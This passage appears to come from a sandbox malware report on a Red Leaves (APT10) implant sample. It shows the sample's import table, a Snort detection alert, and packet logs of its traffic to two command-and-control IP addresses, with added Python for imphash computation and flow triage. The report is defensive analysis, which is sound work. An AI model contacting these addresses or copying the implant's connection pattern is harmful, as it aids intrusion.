GetWindowThreadProcessId, GetActiveWindow, IsWindowEnabled, EqualRect, GetDlgItem, SetWindowLongA, GetDlgCtrlID, GetKeyState, LoadIconW, SetCursor, PeekMessageA, GetCapture, ReleaseCapture, SetClipboardData, OpenClipboard, GetUpdateRect, LoadAcceleratorsA, GetParent, UpdateWindow, EnableWindow, PtInRect, GetClientRect, FrameRect, SetActiveWindow, IsWindowVisible, IsIconic, SendMessageA, InsertMenuItemA, GetSubMenu, GetMenuItemID, GetMenuItemCount, CreatePopupMenu, GetClassInfoA, IntersectRect, OffsetRect, SetRectEmpty, CopyRect, GetMenu, GetLastActivePopup, LoadAcceleratorsW, LoadMenuW, CharNextA, CopyAcceleratorTableA, SetRect, GetWindowRgn, DestroyCursor, DrawIcon, SubtractRect, MapVirtualKeyExA, BringWindowToTop, PostMessageA, SetMenu, GetDesktopWindow, GetWindow, ShowWindow, GetWindowLongA, IsWindow, TranslateAcceleratorA, InvalidateRect, IsCharLowerA, GetDoubleClickTime, CharUpperBuffA, CopyIcon, LoadImageW, MonitorFromWindow, EmptyClipboard, IsClipboardFormatAvailable, SetMenuDefaultItem, WaitMessage, PostThreadMessageA, CreateMenu, IsMenu, UpdateLayeredWindow, MonitorFromPoint, InvalidateRgn, DrawMenuBar, DefMDIChildProcA, DefFrameProcA, RegisterClipboardFormatA, CopyImage, GetIconInfo, EnableScrollBar, HideCaret, InvertRect, GetMenuDefaultItem, LockWindowUpdate, SetCursorPos, CreateAcceleratorTableA, GetKeyboardState, GetKeyboardLayout, ToAsciiEx, DrawFocusRect, DrawFrameControl, DrawEdge, DrawIconEx, DrawStateA, SetClassLongA, GetAsyncKeyState, NotifyWinEvent, WindowFromPoint, DestroyAcceleratorTable, RedrawWindow, SetWindowRgn, IsZoomed, UnregisterClassA, MessageBeep, GetNextDlgGroupItem, GetMessageTime, SetCapture, TranslateMDISysAccel
GDI32.dll | GetLayout, SetLayout, DeleteObject, SelectClipRgn, CreateRectRgn, GetViewportExtEx, GetWindowExtEx, BitBlt, GetPixel, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, SelectObject, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, OffsetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, ExtSelectClipRgn, DeleteDC, CreatePatternBrush, GetStockObject, SelectPalette, GetObjectType, CreatePen, CreateSolidBrush, CreateHatchBrush, GetTextExtentPoint32A, CreateRectRgnIndirect, PatBlt, CreateDIBitmap, GetTextMetricsA, EnumFontFamiliesA, GetTextCharsetInfo, CombineRgn, GetMapMode, DPtoLP, GetBkColor, GetTextColor, GetRgnBox, CreateDIBSection, CreateRoundRectRgn, CreatePolygonRgn, CreateEllipticRgn, Polyline, Polygon, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, RealizePalette, GetSystemPaletteEntries, OffsetRgn, SetDIBColorTable, StretchBlt, SetPixel, Rectangle, EnumFontFamiliesExA, LPtoDP, GetWindowOrgEx, GetViewportOrgEx, PtInRegion, FillRgn, FrameRgn, GetBoundsRect, ExtFloodFill, SetPaletteEntries, GetTextFaceA, SetPixelV, MoveToEx, SetTextAlign, LineTo, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetROP2, SetPolyFillMode, SetBkMode, RestoreDC, SaveDC, CreateDCA, CopyMetaFileA, GetDeviceCaps, CreateFontIndirectA, CreateBitmap, GetObjectA, SetBkColor, SetTextColor, CreateCompatibleDC, SetRectRgn, Ellipse, CreateCompatibleBitmap
MSIMG32.dll | AlphaBlend, TransparentBlt
COMDLG32.dll | GetFileTitleA
WINSPOOL.DRV | OpenPrinterA, DocumentPropertiesA, ClosePrinter
ADVAPI32.dll | RegEnumValueA, RegQueryValueExA, RegOpenKeyExA, RegCreateKeyExA, RegSetValueExA, RegDeleteValueA, RegDeleteKeyA, RegEnumKeyA, RegQueryValueA, RegEnumKeyExA, RegOpenKeyExW, RegCloseKey, RegSetValueA, GetFileSecurityA, SetFileSecurityA
SHELL32.dll | SHAppBarMessage, ShellExecuteA, DragFinish, DragQueryFileA, SHAddToRecentDocs, ExtractIconA, SHBrowseForFolderA, SHGetSpecialFolderPathA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetDesktopFolder, SHGetFileInfoA
COMCTL32.dll | ImageList_GetIconSize
SHLWAPI.dll | PathFindFileNameA, PathStripToRootA, PathIsUNCA, PathFindExtensionA, PathRemoveFileSpecW
ole32.dll | OleIsCurrentClipboard, OleLockRunning, IsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleInitialize, CoFreeUnusedLibraries, OleUninitialize, CoInitializeEx, CreateStreamOnHGlobal, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, CoGetClassObject, OleFlushClipboard, OleDuplicateData, ReleaseStgMedium, StringFromCLSID, CoTaskMemFree, CoTaskMemAlloc, CLSIDFromString, CoCreateGuid, CLSIDFromProgID, CoInitialize, CoCreateInstance, CoUninitialize, DoDragDrop, RevokeDragDrop, CoLockObjectExternal, RegisterDragDrop, OleGetClipboard, CoRegisterMessageFilter, CoRevokeClassObject, StgOpenStorageOnILockBytes
OLEAUT32.dll | SysStringLen, OleCreateFontIndirect, VariantTimeToSystemTime, SystemTimeToVariantTime, SafeArrayDestroy, VariantCopy, VarBstrFromDate, SysAllocStringByteLen, SysFreeString, VariantChangeType, SysAllocStringLen, VariantInit, VariantClear, SysAllocString
oledlg.dll |
OLEACC.dll | AccessibleObjectFromWindow, CreateStdAccessibleObject, LresultFromObject
gdiplus.dll | GdipGetImageGraphicsContext, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromStream, GdipGetImagePalette, GdipGetImagePaletteSize, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipCloneImage, GdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdiplusShutdown, GdiplusStartup, GdipCreateBitmapFromHBITMAP, GdipDisposeImage, GdipDeleteGraphics, GdipAlloc, GdipFree, GdipDrawImageI
IMM32.dll | ImmReleaseContext, ImmGetContext, ImmGetOpenStatus
WINMM.dll | PlaySoundA
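The Import Hash given in the static info above (c20231bee688c91a492f8eb02fe15604) is the MD5 of this import table flattened to lower-case "dll.function" pairs in table order, so it survives recompilation as long as the set and order of imports stay the same and is a common pivot for finding related builds (VirusTotal exposes it as the imphash: search modifier). The routine below is an added example that re-creates the algorithm as pefile.get_imphash() defines it, run on a constructed import list; it is not the report's code and does not reproduce the report's value, which would need the sample's real import table order rather than the listing above. Ordinal-only imports are spelled "ordN" here, on the assumption that pefile's ordinal-to-name lookup table is left out.

```python
"""Import hash (imphash) as pefile.get_imphash() defines it: lower-case
'dll.function' pairs in import-table order, comma-joined, then MD5'd.
Added example on a constructed import list."""
import hashlib

_STRIP = (".dll", ".ocx", ".sys")   # extensions pefile drops from the library name


def imphash_string(imports):
    """imports: [(dll_name, [function name or int ordinal, ...]), ...] in table order."""
    parts = []
    for dll, funcs in imports:
        lib = dll.lower()
        for ext in _STRIP:
            if lib.endswith(ext):
                lib = lib[:-len(ext)]
                break
        for f in funcs:
            # pefile resolves known ordinals to names through a lookup table; without
            # that table (assumption here) an ordinal is spelled ordN, which is also
            # what pefile emits for ordinals it cannot resolve.
            name = f"ord{f}" if isinstance(f, int) else f
            parts.append(f"{lib}.{name.lower()}")
    return ",".join(parts)


def imphash(imports):
    return hashlib.md5(imphash_string(imports).encode()).hexdigest()


# Constructed import list, a small slice in the report's style.
DEMO_IMPORTS = [
    ("KERNEL32.dll", ["LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect"]),
    ("USER32.dll", ["MessageBoxA", 123]),
]

if __name__ == "__main__":
    print(imphash_string(DEMO_IMPORTS))
    print(imphash(DEMO_IMPORTS))
```

Two properties follow from the construction and are worth remembering when pivoting: case and extension of the DLL name do not matter, but the order of the entries does, so a build that merely reorders its imports gets a different imphash.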
Description | Data
Translation | 0x0009 0x04b0
Language of compilation system | Country where language is spoken
Chinese | China
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/10/22-07:23:02.013122 | TCP | 2024173 | ET TROJAN Red Leaves magic packet detected (APT10 implant) | 49764 | 80 | 192.168.2.4 | 67.205.132.17
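The Snort hit above fires on the port-80 flow from source port 49764, on the client packet stamped 07:23:02.013122 in the per-packet table of this report. Read alongside that table, the pattern is one peer, 67.205.132.17, contacted on 443, then 53, 995 and 80 in turn, which is what the "Connects to many ports of the same IP" signature keys on. Two of those probes, to 53 and 995, consist of three client packets each at +0, +3 and +9 seconds with no reply, which matches the default Windows SYN retransmit schedule (two retries, 3 s then 6 s apart): those ports were closed or filtered at the time, not live services, while 443 and 80 answered. The script below is an added example, not part of the Joe Sandbox report, that runs exactly that triage over a constructed subset of the table's rows: it groups packets into flows, lists remote hosts hit on many distinct ports, and reports unanswered flows with their retransmit gaps. The local host address and the three-port threshold are assumptions.

```python
"""Flow triage over a sandbox per-packet table: group packets into flows,
list remote hosts contacted on many distinct ports, and find client-side
flows that never drew a reply together with their retransmit spacing.
Added example; SAMPLE_ROWS is a constructed subset copied from the report's
table, LOCAL_IP and the port threshold are assumptions."""
from collections import defaultdict
from datetime import datetime
from typing import NamedTuple

LOCAL_IP = "192.168.2.4"   # the sandbox VM (assumption)

SAMPLE_ROWS = """\
Mar 10, 2022 07:21:37.608027935 CET | 49736 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:37.608115911 CET | 443 | 49736 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:53.106363058 CET | 49743 | 443 | 192.168.2.4 | 144.168.45.116
Mar 10, 2022 07:21:53.106456041 CET | 443 | 49743 | 144.168.45.116 | 192.168.2.4
Mar 10, 2022 07:22:03.153788090 CET | 49746 | 53 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:06.168540955 CET | 49746 | 53 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.184732914 CET | 49746 | 53 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:32.485387087 CET | 49757 | 995 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:35.499186993 CET | 49757 | 995 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.499576092 CET | 49757 | 995 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:01.908960104 CET | 49764 | 80 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:02.012634039 CET | 80 | 49764 | 67.205.132.17 | 192.168.2.4
"""


class Packet(NamedTuple):
    when: datetime
    sport: int
    dport: int
    sip: str
    dip: str


def parse_row(line):
    ts, sport, dport, sip, dip = (f.strip() for f in line.split("|"))
    base, frac = ts.replace(" CET", "").rsplit(".", 1)
    # %f accepts at most six digits, so truncate the nanosecond fraction
    when = datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    return Packet(when, int(sport), int(dport), sip, dip)


def load_packets(text):
    return [parse_row(line) for line in text.splitlines() if line.strip()]


def summarize_flows(packets, local_ip=LOCAL_IP):
    """Key flows by (local port, remote ip, remote port) and count both directions."""
    flows = {}
    for p in packets:
        outbound = p.sip == local_ip
        key = (p.sport, p.dip, p.dport) if outbound else (p.dport, p.sip, p.sport)
        f = flows.setdefault(key, {"out": 0, "in": 0, "out_times": []})
        if outbound:
            f["out"] += 1
            f["out_times"].append(p.when)
        else:
            f["in"] += 1
    return flows


def many_ports(flows, threshold=3):
    """Remote hosts contacted on at least `threshold` distinct ports."""
    ports = defaultdict(set)
    for _lport, rip, rport in flows:
        ports[rip].add(rport)
    return {rip: sorted(ps) for rip, ps in ports.items() if len(ps) >= threshold}


def unanswered(flows):
    """Flows with client packets only, plus whole-second gaps between those packets:
    [3, 6] is the SYN, SYN+3s, SYN+9s retransmit pattern of an unreachable port."""
    out = []
    for (_lport, rip, rport), f in sorted(flows.items(), key=lambda kv: (kv[0][1], kv[0][2])):
        if f["in"] == 0:
            t = f["out_times"]
            gaps = [round((b - a).total_seconds()) for a, b in zip(t, t[1:])]
            out.append((rip, rport, gaps))
    return out


if __name__ == "__main__":
    flows = summarize_flows(load_packets(SAMPLE_ROWS))
    print("many ports:", many_ports(flows))
    print("unanswered:", unanswered(flows))
```

Fed the full table, the same two functions separate the hosts that actually served the implant (here 67.205.132.17 on 443 and 80, and 144.168.45.116 on 443) from ports that were merely tried, which is the distinction to make before turning the port list into blocking rules.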
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 10, 2022 07:21:37.608027935 CET | 49736 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:37.608115911 CET | 443 | 49736 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:37.608268023 CET | 49736 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:37.608624935 CET | 49736 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:37.608640909 CET | 443 | 49736 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:37.608659029 CET | 49736 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:37.608669996 CET | 443 | 49736 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:37.608793974 CET | 443 | 49736 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.973103046 CET | 49737 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.973156929 CET | 443 | 49737 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.973328114 CET | 49737 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.974839926 CET | 49737 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.974857092 CET | 443 | 49737 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.974925041 CET | 443 | 49737 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.974950075 CET | 49737 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.974972963 CET | 443 | 49737 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.976782084 CET | 49738 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.976818085 CET | 443 | 49738 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.976900101 CET | 49738 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.977200031 CET | 49738 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.977219105 CET | 443 | 49738 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.977279902 CET | 49738 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.977293015 CET | 443 | 49738 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.977401018 CET | 443 | 49738 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.992253065 CET | 49739 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.992326021 CET | 443 | 49739 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.992415905 CET | 49739 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.993453026 CET | 49739 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.993479013 CET | 443 | 49739 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.993547916 CET | 443 | 49739 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.995389938 CET | 49740 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.995440960 CET | 443 | 49740 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.995537996 CET | 49740 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.995886087 CET | 49740 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.995913029 CET | 443 | 49740 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.995955944 CET | 443 | 49740 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.995991945 CET | 49740 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.996011972 CET | 443 | 49740 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.997436047 CET | 49741 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.997484922 CET | 443 | 49741 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.998003960 CET | 49741 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.998060942 CET | 49741 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.998078108 CET | 443 | 49741 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.998094082 CET | 49741 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:21:42.998102903 CET | 443 | 49741 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:42.998209000 CET | 443 | 49741 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:21:53.106363058 CET | 49743 | 443 | 192.168.2.4 | 144.168.45.116
Mar 10, 2022 07:21:53.106456041 CET | 443 | 49743 | 144.168.45.116 | 192.168.2.4
Mar 10, 2022 07:21:53.106570959 CET | 49743 | 443 | 192.168.2.4 | 144.168.45.116
Mar 10, 2022 07:21:53.108678102 CET | 49743 | 443 | 192.168.2.4 | 144.168.45.116
Mar 10, 2022 07:21:53.108748913 CET | 443 | 49743 | 144.168.45.116 | 192.168.2.4
Mar 10, 2022 07:21:53.108772039 CET | 49743 | 443 | 192.168.2.4 | 144.168.45.116
Mar 10, 2022 07:21:53.108789921 CET | 443 | 49743 | 144.168.45.116 | 192.168.2.4
Mar 10, 2022 07:21:53.108952999 CET | 443 | 49743 | 144.168.45.116 | 192.168.2.4
Mar 10, 2022 07:22:03.153788090 CET | 49746 | 53 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:06.168540955 CET | 49746 | 53 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.184732914 CET | 49746 | 53 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.366229057 CET | 49747 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.366271973 CET | 443 | 49747 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.366451979 CET | 49747 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.366818905 CET | 49747 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.366833925 CET | 443 | 49747 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.366939068 CET | 443 | 49747 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.368575096 CET | 49748 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.368624926 CET | 443 | 49748 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.368717909 CET | 49748 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.369051933 CET | 49748 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.369082928 CET | 443 | 49748 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.369129896 CET | 443 | 49748 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.369153023 CET | 49748 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.369174957 CET | 443 | 49748 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.370532990 CET | 49749 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.370563984 CET | 443 | 49749 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.370745897 CET | 49749 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.372329950 CET | 49749 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.372349024 CET | 443 | 49749 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.372400045 CET | 443 | 49749 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.372473955 CET | 49749 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.372488022 CET | 443 | 49749 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.374878883 CET | 49750 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.374902964 CET | 443 | 49750 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.374969959 CET | 49750 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.375251055 CET | 49750 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.375267029 CET | 443 | 49750 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.375308990 CET | 443 | 49750 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.375382900 CET | 49750 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.375394106 CET | 443 | 49750 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.396006107 CET | 49751 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.396064997 CET | 443 | 49751 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.396150112 CET | 49751 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.396461010 CET | 49751 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:12.396492958 CET | 443 | 49751 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:12.396565914 CET | 443 | 49751 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:22.436521053 CET | 49756 | 443 | 192.168.2.4 | 144.168.45.116
Mar 10, 2022 07:22:22.436614990 CET | 443 | 49756 | 144.168.45.116 | 192.168.2.4
Mar 10, 2022 07:22:22.436717033 CET | 49756 | 443 | 192.168.2.4 | 144.168.45.116
Mar 10, 2022 07:22:22.437103033 CET | 49756 | 443 | 192.168.2.4 | 144.168.45.116
Mar 10, 2022 07:22:22.437125921 CET | 443 | 49756 | 144.168.45.116 | 192.168.2.4
Mar 10, 2022 07:22:22.437145948 CET | 49756 | 443 | 192.168.2.4 | 144.168.45.116
Mar 10, 2022 07:22:22.437156916 CET | 443 | 49756 | 144.168.45.116 | 192.168.2.4
Mar 10, 2022 07:22:22.437196016 CET | 443 | 49756 | 144.168.45.116 | 192.168.2.4
Mar 10, 2022 07:22:32.485387087 CET | 49757 | 995 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:35.499186993 CET | 49757 | 995 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.499576092 CET | 49757 | 995 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.756865025 CET | 49758 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.756936073 CET | 443 | 49758 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.757055998 CET | 49758 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.757384062 CET | 49758 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.757410049 CET | 443 | 49758 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.757497072 CET | 443 | 49758 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.757600069 CET | 49758 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.757621050 CET | 443 | 49758 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.759078026 CET | 49759 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.759146929 CET | 443 | 49759 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.760272026 CET | 49759 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.760591984 CET | 49759 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.760622978 CET | 443 | 49759 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.760663986 CET | 49759 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.760668039 CET | 443 | 49759 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.760693073 CET | 443 | 49759 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.762319088 CET | 49760 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.762377024 CET | 443 | 49760 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.762454033 CET | 49760 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.762743950 CET | 49760 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.762769938 CET | 443 | 49760 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.762810946 CET | 443 | 49760 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.762919903 CET | 49760 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.762937069 CET | 443 | 49760 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.764241934 CET | 49761 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.764287949 CET | 443 | 49761 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.764377117 CET | 49761 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.764647961 CET | 49761 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.764672995 CET | 443 | 49761 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.764715910 CET | 443 | 49761 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.764782906 CET | 49761 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.764801979 CET | 443 | 49761 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.821080923 CET | 49762 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.821141005 CET | 443 | 49762 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.821234941 CET | 49762 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.821583033 CET | 49762 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.821615934 CET | 443 | 49762 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.821687937 CET | 443 | 49762 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:41.821732998 CET | 49762 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:22:41.821763039 CET | 443 | 49762 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:22:51.860562086 CET | 49763 | 443 | 192.168.2.4 | 144.168.45.116
Mar 10, 2022 07:22:51.860620022 CET | 443 | 49763 | 144.168.45.116 | 192.168.2.4
Mar 10, 2022 07:22:51.860721111 CET | 49763 | 443 | 192.168.2.4 | 144.168.45.116
Mar 10, 2022 07:22:51.861187935 CET | 49763 | 443 | 192.168.2.4 | 144.168.45.116
Mar 10, 2022 07:22:51.861203909 CET | 443 | 49763 | 144.168.45.116 | 192.168.2.4
Mar 10, 2022 07:22:51.861249924 CET | 443 | 49763 | 144.168.45.116 | 192.168.2.4
Mar 10, 2022 07:22:51.861258984 CET | 49763 | 443 | 192.168.2.4 | 144.168.45.116
Mar 10, 2022 07:22:51.861270905 CET | 443 | 49763 | 144.168.45.116 | 192.168.2.4
Mar 10, 2022 07:23:01.908960104 CET | 49764 | 80 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:02.012634039 CET | 80 | 49764 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:02.012759924 CET | 49764 | 80 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:02.013122082 CET | 49764 | 80 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:02.013169050 CET | 49764 | 80 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:02.116442919 CET | 80 | 49764 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:02.116471052 CET | 80 | 49764 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:02.116496086 CET | 80 | 49764 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:02.116514921 CET | 80 | 49764 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:02.116650105 CET | 49764 | 80 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.486567020 CET | 49765 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.486629963 CET | 443 | 49765 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.486742973 CET | 49765 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.487189054 CET | 49765 | 443 | 192.168.2.4 | 67.205.132.17
Mar 10, 2022 07:23:07.487215042 CET | 443 | 49765 | 67.205.132.17 | 192.168.2.4
Mar 10, 2022 07:23:07.487267971 CET | 49765 | 443 | 192.168.2.4 | 67.205.132.17
